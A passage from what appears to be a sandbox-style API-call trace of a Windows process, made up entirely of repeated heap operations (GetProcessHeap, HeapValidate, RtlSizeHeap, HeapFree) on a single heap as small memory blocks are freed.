(HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525748) returned 0x14 [0085.686] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525748 | out: hHeap=0x510000) returned 1 [0085.686] GetProcessHeap () returned 0x510000 [0085.686] GetProcessHeap () returned 0x510000 [0085.686] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525f30) returned 1 [0085.686] GetProcessHeap () returned 0x510000 [0085.686] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525f30) returned 0x10 [0085.686] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525f30 | out: hHeap=0x510000) returned 1 [0085.686] GetProcessHeap () returned 0x510000 [0085.686] GetProcessHeap () returned 0x510000 [0085.686] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525728) returned 1 [0085.686] GetProcessHeap () returned 0x510000 [0085.687] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525728) returned 0x14 [0085.687] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525728 | out: hHeap=0x510000) returned 1 [0085.687] GetProcessHeap () returned 0x510000 [0085.687] GetProcessHeap () returned 0x510000 [0085.687] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525708) returned 1 [0085.687] GetProcessHeap () returned 0x510000 [0085.687] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525708) returned 0x14 [0085.687] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525708 | out: hHeap=0x510000) returned 1 [0085.687] GetProcessHeap () returned 0x510000 [0085.687] GetProcessHeap () returned 0x510000 [0085.687] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5256e8) returned 1 [0085.687] GetProcessHeap () returned 0x510000 [0085.687] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5256e8) returned 0x14 [0085.687] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5256e8 | out: hHeap=0x510000) returned 1 [0085.687] GetProcessHeap () returned 0x510000 [0085.687] GetProcessHeap () returned 0x510000 [0085.687] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525f48) returned 1 [0085.687] GetProcessHeap () returned 0x510000 [0085.687] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525f48) returned 0xe [0085.687] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525f48 | out: hHeap=0x510000) returned 1 [0085.687] GetProcessHeap () returned 0x510000 [0085.687] GetProcessHeap () returned 0x510000 [0085.687] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5256c8) returned 1 [0085.688] GetProcessHeap () returned 0x510000 [0085.688] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5256c8) returned 0x14 [0085.688] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5256c8 | out: hHeap=0x510000) returned 1 [0085.688] GetProcessHeap () returned 0x510000 [0085.688] GetProcessHeap () returned 0x510000 [0085.688] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525f60) returned 1 [0085.688] GetProcessHeap () returned 0x510000 [0085.688] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525f60) returned 0xe [0085.688] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525f60 | out: hHeap=0x510000) returned 1 [0085.688] GetProcessHeap () returned 0x510000 [0085.688] GetProcessHeap () returned 0x510000 [0085.688] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5256a8) returned 1 [0085.688] GetProcessHeap () returned 0x510000 [0085.688] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5256a8) returned 0x14 [0085.688] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5256a8 | out: hHeap=0x510000) returned 1 [0085.688] GetProcessHeap () returned 0x510000 [0085.688] GetProcessHeap () returned 0x510000 [0085.688] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525f78) returned 1 [0085.688] GetProcessHeap () returned 0x510000 [0085.688] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525f78) returned 0xe [0085.688] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525f78 | out: hHeap=0x510000) returned 1 [0085.688] GetProcessHeap () returned 0x510000 [0085.688] GetProcessHeap () returned 0x510000 [0085.689] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525688) returned 1 [0085.689] GetProcessHeap () returned 0x510000 [0085.689] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525688) returned 0x14 [0085.689] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525688 | out: hHeap=0x510000) returned 1 [0085.689] GetProcessHeap () returned 0x510000 [0085.689] GetProcessHeap () returned 0x510000 [0085.689] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525668) returned 1 [0085.689] GetProcessHeap () returned 0x510000 [0085.689] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525668) returned 0x12 [0085.689] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525668 | out: hHeap=0x510000) returned 1 [0085.689] GetProcessHeap () returned 0x510000 [0085.689] GetProcessHeap () returned 0x510000 [0085.689] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525648) returned 1 [0085.689] GetProcessHeap () returned 0x510000 [0085.689] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525648) returned 0x14 [0085.689] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525648 | out: hHeap=0x510000) returned 1 [0085.689] GetProcessHeap () returned 0x510000 [0085.689] GetProcessHeap () returned 0x510000 [0085.689] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525628) returned 1 [0085.689] GetProcessHeap () returned 0x510000 [0085.689] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525628) returned 0x12 [0085.689] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525628 | out: hHeap=0x510000) returned 1 [0085.689] GetProcessHeap () returned 0x510000 [0085.690] GetProcessHeap () returned 0x510000 [0085.690] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525608) returned 1 [0085.690] GetProcessHeap () returned 0x510000 [0085.690] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525608) returned 0x14 [0085.690] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525608 | out: hHeap=0x510000) returned 1 [0085.690] GetProcessHeap () returned 0x510000 [0085.690] GetProcessHeap () returned 0x510000 [0085.690] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5255e8) returned 1 [0085.690] GetProcessHeap () returned 0x510000 [0085.690] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5255e8) returned 0x18 [0085.690] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5255e8 | out: hHeap=0x510000) returned 1 [0085.690] GetProcessHeap () returned 0x510000 [0085.690] GetProcessHeap () returned 0x510000 [0085.690] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5255c8) returned 1 [0085.690] GetProcessHeap () returned 0x510000 [0085.690] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5255c8) returned 0x14 [0085.690] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5255c8 | out: hHeap=0x510000) returned 1 [0085.690] GetProcessHeap () returned 0x510000 [0085.690] GetProcessHeap () returned 0x510000 [0085.690] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525f90) returned 1 [0085.690] GetProcessHeap () returned 0x510000 [0085.690] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525f90) returned 0xa [0085.691] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525f90 | out: hHeap=0x510000) returned 1 [0085.691] GetProcessHeap () returned 0x510000 [0085.691] GetProcessHeap () returned 0x510000 [0085.691] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5255a8) returned 1 [0085.691] GetProcessHeap () returned 0x510000 [0085.691] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5255a8) returned 0x14 [0085.691] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5255a8 | out: hHeap=0x510000) returned 1 [0085.691] GetProcessHeap () returned 0x510000 [0085.691] GetProcessHeap () returned 0x510000 [0085.691] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x523fc8) returned 1 [0085.691] GetProcessHeap () returned 0x510000 [0085.691] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x523fc8) returned 0x1a [0085.691] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x523fc8 | out: hHeap=0x510000) returned 1 [0085.691] GetProcessHeap () returned 0x510000 [0085.691] GetProcessHeap () returned 0x510000 [0085.691] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525588) returned 1 [0085.691] GetProcessHeap () returned 0x510000 [0085.691] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525588) returned 0x14 [0085.691] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525588 | out: hHeap=0x510000) returned 1 [0085.691] GetProcessHeap () returned 0x510000 [0085.691] GetProcessHeap () returned 0x510000 [0085.692] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525fa8) returned 1 [0085.692] GetProcessHeap () returned 0x510000 [0085.692] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525fa8) returned 0x10 [0085.692] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525fa8 | out: hHeap=0x510000) returned 1 [0085.692] GetProcessHeap () returned 0x510000 [0085.692] GetProcessHeap () returned 0x510000 [0085.692] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525568) returned 1 [0085.692] GetProcessHeap () returned 0x510000 [0085.692] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525568) returned 0x14 [0085.692] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525568 | out: hHeap=0x510000) returned 1 [0085.692] GetProcessHeap () returned 0x510000 [0085.692] GetProcessHeap () returned 0x510000 [0085.692] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525fc0) returned 1 [0085.692] GetProcessHeap () returned 0x510000 [0085.692] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525fc0) returned 0x10 [0085.692] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525fc0 | out: hHeap=0x510000) returned 1 [0085.692] GetProcessHeap () returned 0x510000 [0085.692] GetProcessHeap () returned 0x510000 [0085.723] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525548) returned 1 [0085.723] GetProcessHeap () returned 0x510000 [0085.723] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525548) returned 0x14 [0085.723] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525548 | out: hHeap=0x510000) returned 1 [0085.723] GetProcessHeap () returned 0x510000 [0085.723] GetProcessHeap () returned 0x510000 [0085.723] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525fd8) returned 1 [0085.723] GetProcessHeap () returned 0x510000 [0085.723] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525fd8) returned 0x10 [0085.724] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525fd8 | out: hHeap=0x510000) returned 1 [0085.724] GetProcessHeap () returned 0x510000 [0085.724] GetProcessHeap () returned 0x510000 [0085.724] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525528) returned 1 [0085.724] GetProcessHeap () returned 0x510000 [0085.724] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525528) returned 0x14 [0085.724] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525528 | out: hHeap=0x510000) returned 1 [0085.724] GetProcessHeap () returned 0x510000 [0085.724] GetProcessHeap () returned 0x510000 [0085.724] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x523fa0) returned 1 [0085.724] GetProcessHeap () returned 0x510000 [0085.724] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x523fa0) returned 0x1a [0085.724] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x523fa0 | out: hHeap=0x510000) returned 1 [0085.724] GetProcessHeap () returned 0x510000 [0085.724] GetProcessHeap () returned 0x510000 [0085.724] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525508) returned 1 [0085.724] GetProcessHeap () returned 0x510000 [0085.724] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525508) returned 0x14 [0085.724] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525508 | out: hHeap=0x510000) returned 1 [0085.724] GetProcessHeap () returned 0x510000 [0085.724] GetProcessHeap () returned 0x510000 [0085.725] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525ff0) returned 1 [0085.725] GetProcessHeap () returned 0x510000 [0085.725] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525ff0) returned 0xc [0085.725] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525ff0 | out: hHeap=0x510000) returned 1 [0085.725] GetProcessHeap () returned 0x510000 [0085.725] GetProcessHeap () returned 0x510000 [0085.725] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5254e8) returned 1 [0085.725] GetProcessHeap () returned 0x510000 [0085.725] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5254e8) returned 0x14 [0085.725] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5254e8 | out: hHeap=0x510000) returned 1 [0085.725] GetProcessHeap () returned 0x510000 [0085.725] GetProcessHeap () returned 0x510000 [0085.725] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5254c8) returned 1 [0085.725] GetProcessHeap () returned 0x510000 [0085.725] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5254c8) returned 0x18 [0085.725] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5254c8 | out: hHeap=0x510000) returned 1 [0085.725] GetProcessHeap () returned 0x510000 [0085.725] GetProcessHeap () returned 0x510000 [0085.725] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5254a8) returned 1 [0085.725] GetProcessHeap () returned 0x510000 [0085.725] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5254a8) returned 0x14 [0085.725] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5254a8 | out: hHeap=0x510000) returned 1 [0085.725] GetProcessHeap () returned 0x510000 [0085.725] GetProcessHeap () returned 0x510000 [0085.726] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525488) returned 1 [0085.726] GetProcessHeap () returned 0x510000 [0085.726] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525488) returned 0x12 [0085.726] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525488 | out: hHeap=0x510000) returned 1 [0085.726] GetProcessHeap () returned 0x510000 [0085.726] GetProcessHeap () returned 0x510000 [0085.726] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525468) returned 1 [0085.726] GetProcessHeap () returned 0x510000 [0085.726] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525468) returned 0x14 [0085.726] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525468 | out: hHeap=0x510000) returned 1 [0085.726] GetProcessHeap () returned 0x510000 [0085.726] GetProcessHeap () returned 0x510000 [0085.726] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526008) returned 1 [0085.726] GetProcessHeap () returned 0x510000 [0085.726] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526008) returned 0xe [0085.726] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526008 | out: hHeap=0x510000) returned 1 [0085.726] GetProcessHeap () returned 0x510000 [0085.726] GetProcessHeap () returned 0x510000 [0085.727] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525448) returned 1 [0085.727] GetProcessHeap () returned 0x510000 [0085.727] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525448) returned 0x14 [0085.727] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525448 | out: hHeap=0x510000) returned 1 [0085.727] GetProcessHeap () returned 0x510000 [0085.727] GetProcessHeap () returned 0x510000 [0085.727] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525428) returned 1 [0085.727] GetProcessHeap () returned 0x510000 [0085.727] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525428) returned 0x12 [0085.727] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525428 | out: hHeap=0x510000) returned 1 [0085.727] GetProcessHeap () returned 0x510000 [0085.727] GetProcessHeap () returned 0x510000 [0085.727] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525408) returned 1 [0085.727] GetProcessHeap () returned 0x510000 [0085.727] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525408) returned 0x14 [0085.727] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525408 | out: hHeap=0x510000) returned 1 [0085.727] GetProcessHeap () returned 0x510000 [0085.728] GetProcessHeap () returned 0x510000 [0085.728] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526020) returned 1 [0085.728] GetProcessHeap () returned 0x510000 [0085.728] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526020) returned 0x10 [0085.728] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526020 | out: hHeap=0x510000) returned 1 [0085.728] GetProcessHeap () returned 0x510000 [0085.728] GetProcessHeap () returned 0x510000 [0085.728] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5253e8) returned 1 [0085.728] GetProcessHeap () returned 0x510000 [0085.728] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5253e8) returned 0x14 [0085.728] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5253e8 | out: hHeap=0x510000) returned 1 [0085.728] GetProcessHeap () returned 0x510000 [0085.728] GetProcessHeap () returned 0x510000 [0085.728] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x524018) returned 1 [0085.728] GetProcessHeap () returned 0x510000 [0085.728] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x524018) returned 0x20 [0085.728] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x524018 | out: hHeap=0x510000) returned 1 [0085.729] GetProcessHeap () returned 0x510000 [0085.729] GetProcessHeap () returned 0x510000 [0085.729] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526548) returned 1 [0085.729] GetProcessHeap () returned 0x510000 [0085.729] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526548) returned 0x14 [0085.729] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526548 | out: hHeap=0x510000) returned 1 [0085.729] GetProcessHeap () returned 0x510000 [0085.729] GetProcessHeap () returned 0x510000 [0085.729] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526038) returned 1 [0085.729] GetProcessHeap () returned 0x510000 [0085.729] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526038) returned 0xe [0085.729] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526038 | out: hHeap=0x510000) returned 1 [0085.729] GetProcessHeap () returned 0x510000 [0085.729] GetProcessHeap () returned 0x510000 [0085.729] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526568) returned 1 [0085.729] GetProcessHeap () returned 0x510000 [0085.730] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526568) returned 0x14 [0085.730] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526568 | out: hHeap=0x510000) returned 1 [0085.730] GetProcessHeap () returned 0x510000 [0085.730] GetProcessHeap () returned 0x510000 [0085.730] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525258) returned 1 [0085.730] GetProcessHeap () returned 0x510000 [0085.730] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525258) returned 0x8 [0085.730] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525258 | out: hHeap=0x510000) returned 1 [0085.730] GetProcessHeap () returned 0x510000 [0085.730] GetProcessHeap () returned 0x510000 [0085.730] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526588) returned 1 [0085.730] GetProcessHeap () returned 0x510000 [0085.730] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526588) returned 0x14 [0085.730] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526588 | out: hHeap=0x510000) returned 1 [0085.730] GetProcessHeap () returned 0x510000 [0085.730] GetProcessHeap () returned 0x510000 [0085.731] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x524040) returned 1 [0085.731] GetProcessHeap () returned 0x510000 [0085.731] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x524040) returned 0x1a [0085.731] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x524040 | out: hHeap=0x510000) returned 1 [0085.731] GetProcessHeap () returned 0x510000 [0085.731] GetProcessHeap () returned 0x510000 [0085.731] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5265a8) returned 1 [0085.731] GetProcessHeap () returned 0x510000 [0085.731] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5265a8) returned 0x14 [0085.731] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5265a8 | out: hHeap=0x510000) returned 1 [0085.731] GetProcessHeap () returned 0x510000 [0085.731] GetProcessHeap () returned 0x510000 [0085.731] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526050) returned 1 [0085.731] GetProcessHeap () returned 0x510000 [0085.731] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526050) returned 0xa [0085.731] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526050 | out: hHeap=0x510000) returned 1 [0085.731] GetProcessHeap () returned 0x510000 [0085.731] GetProcessHeap () returned 0x510000 [0085.731] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5265c8) returned 1 [0085.732] GetProcessHeap () returned 0x510000 [0085.732] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5265c8) returned 0x14 [0085.732] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5265c8 | out: hHeap=0x510000) returned 1 [0085.732] GetProcessHeap () returned 0x510000 [0085.732] GetProcessHeap () returned 0x510000 [0085.732] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5262a0) returned 1 [0085.732] GetProcessHeap () returned 0x510000 [0085.732] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5262a0) returned 0x24 [0085.732] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5262a0 | out: hHeap=0x510000) returned 1 [0085.732] GetProcessHeap () returned 0x510000 [0085.732] GetProcessHeap () returned 0x510000 [0085.732] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5265e8) returned 1 [0085.732] GetProcessHeap () returned 0x510000 [0085.732] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5265e8) returned 0x14 [0085.732] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5265e8 | out: hHeap=0x510000) returned 1 [0085.732] GetProcessHeap () returned 0x510000 [0085.732] GetProcessHeap () returned 0x510000 [0085.732] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526608) returned 1 [0085.732] GetProcessHeap () returned 0x510000 [0085.733] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526608) returned 0x12 [0085.733] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526608 | out: hHeap=0x510000) returned 1 [0085.733] GetProcessHeap () returned 0x510000 [0085.733] GetProcessHeap () returned 0x510000 [0085.733] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526628) returned 1 [0085.733] GetProcessHeap () returned 0x510000 [0085.733] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526628) returned 0x14 [0085.733] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526628 | out: hHeap=0x510000) returned 1 [0085.733] GetProcessHeap () returned 0x510000 [0085.733] GetProcessHeap () returned 0x510000 [0085.733] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526648) returned 1 [0085.733] GetProcessHeap () returned 0x510000 [0085.733] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526648) returned 0x16 [0085.733] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526648 | out: hHeap=0x510000) returned 1 [0085.733] GetProcessHeap () returned 0x510000 [0085.733] GetProcessHeap () returned 0x510000 [0085.733] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526668) returned 1 [0085.733] GetProcessHeap () returned 0x510000 [0085.734] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526668) returned 0x14 [0085.734] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526668 | out: hHeap=0x510000) returned 1 [0085.734] GetProcessHeap () returned 0x510000 [0085.734] GetProcessHeap () returned 0x510000 [0085.734] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526068) returned 1 [0085.734] GetProcessHeap () returned 0x510000 [0085.734] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526068) returned 0x10 [0085.734] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526068 | out: hHeap=0x510000) returned 1 [0085.734] GetProcessHeap () returned 0x510000 [0085.734] GetProcessHeap () returned 0x510000 [0085.734] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526688) returned 1 [0085.734] GetProcessHeap () returned 0x510000 [0085.734] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526688) returned 0x14 [0085.734] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526688 | out: hHeap=0x510000) returned 1 [0085.734] GetProcessHeap () returned 0x510000 [0085.734] GetProcessHeap () returned 0x510000 [0085.734] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5266a8) returned 1 [0085.734] GetProcessHeap () returned 0x510000 [0085.734] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5266a8) returned 0x18 [0085.734] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5266a8 | out: hHeap=0x510000) returned 1 [0085.735] GetProcessHeap () returned 0x510000 [0085.735] GetProcessHeap () returned 0x510000 [0085.735] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5266c8) returned 1 [0085.735] GetProcessHeap () returned 0x510000 [0085.735] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5266c8) returned 0x14 [0085.735] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5266c8 | out: hHeap=0x510000) returned 1 [0085.735] GetProcessHeap () returned 0x510000 [0085.735] GetProcessHeap () returned 0x510000 [0085.735] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526080) returned 1 [0085.735] GetProcessHeap () returned 0x510000 [0085.735] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526080) returned 0xc [0085.735] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526080 | out: hHeap=0x510000) returned 1 [0085.735] GetProcessHeap () returned 0x510000 [0085.735] GetProcessHeap () returned 0x510000 [0085.735] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5266e8) returned 1 [0085.735] GetProcessHeap () returned 0x510000 [0085.735] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5266e8) returned 0x14 [0085.735] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5266e8 | out: hHeap=0x510000) returned 1 [0085.735] GetProcessHeap () returned 0x510000 [0085.735] GetProcessHeap () returned 0x510000 [0085.736] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x524068) returned 1 [0085.736] GetProcessHeap () returned 0x510000 [0085.736] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x524068) returned 0x1a [0085.736] 